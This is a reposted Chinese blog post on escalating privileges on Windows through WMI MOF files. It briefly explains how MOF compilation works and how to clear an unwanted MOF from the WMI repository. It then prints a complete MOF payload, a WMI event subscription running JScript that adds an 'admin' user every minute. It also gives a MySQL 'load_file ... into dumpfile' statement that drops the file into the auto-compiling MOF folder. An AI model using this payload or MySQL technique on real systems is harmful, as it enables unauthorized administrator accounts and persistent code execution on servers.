MOF文件提权

作者：admin 发布于：2013-5-25 19:02 Saturday 分类：网络转载

Windows 管理规范 (WMI) 提供了以下三种方法编译到WMI存储库的托管对象格式 (MOF) 文件：

方法 1： 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

方法2： 使用 IMofCompiler 接口和 $ CompileFile 方法。 

方法 3： 拖放到%SystemRoot%\System32\Wbem\MOF文件夹的 MOF 文件。 

Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件，
或使用 IMofCompiler::CompileFile 方法。

注意:
第三种方法仅为向后兼容性与早期版本（win2003）的 WMI 提供，
并因为此功能可能不会提供在将来的版本后，不应使用。 

鬼哥:
我现在只想知道怎么停止已执行的mof，
昨天测试的时候放了个.mof到
C:\WINDOWS\system32\wbem\mof\
从昨天晚上一直到现在还在每过5秒就执行次加个用户，
搞的我郁闷死了。。。

解决办法：
第一 net stop winmgmt 停止服务，
第二 删除文件夹：C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
第四：完毕不会在执行了。
C:\WINDOWS\system32\wbem\Repository\ 放的是储存库　我们执行的.mof都会被加入到这个库了。
然后一直按脚本设置的时间执行。。
删除后　重新启动　会重建个默认储存库　这样我们先前执行mof就没了。

-------------------------------XXX.MOF-----------------------------------------------------------
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
-------------------------------XXX.MOF end-----------------------------------------------------------

最近的MYSQL提权也是利用此法.
1.找个可写目录，上传mof文件
2.执行sql
select load_file('C:\\RECYCLER\\nullevt.mof') into 
dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

标签: mof